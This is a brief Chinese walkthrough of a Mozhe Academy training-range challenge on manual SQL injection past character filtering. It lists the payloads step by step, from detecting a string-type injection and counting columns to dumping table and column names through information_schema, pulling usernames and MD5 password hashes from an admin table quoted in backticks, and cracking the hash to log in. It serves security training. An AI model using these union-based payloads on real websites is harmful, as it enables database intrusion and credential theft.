墨者学院-SQL过滤字符后手工注入漏洞测试(第3题)

靶场地址:
https://www.mozhe.cn/bug/detail/ZVBYR3I3eG9USnpIT0xqaDdtR09SQT09bW96aGUmozhe

测试是数字型还是字符型注入
id=1' 报错
id=1'%23 回显正常,是字符型注入

查询有几列,并且查看哪一列会回显在页面上
id=1' and 1=2 union select 1,2,3,4,5,6,7%23,查询共有7列,2,3,4,5列回显在页面上

暴库名以及表名
id=1' and 1=2 union select 1,database(),group_concat(table_name),4,5,6,7 from information_schema.tables where table_schema=database()%23
显示位置不够,可以打开f12查看

暴(@dmin9_td4b}表的字段名
id=1' and 1=2 union select 1,group_concat(column_name),3,4,5,6,7 from information_schema.columns where table_name='(@dmin9_td4b}'%23

暴status为1的账号信息,由于(@dmin9_td4b}涉及了关键字符,需要` `包起来
id=1' and 1=2 union select 1,id,username,password,status,6,7 from `(@dmin9_td4b}` where status=1%23

将密码进行md5解密,登录就看到key了(所以还是想问过滤了什么字符)

你可能感兴趣的:(墨者学院-SQL过滤字符后手工注入漏洞测试(第3题))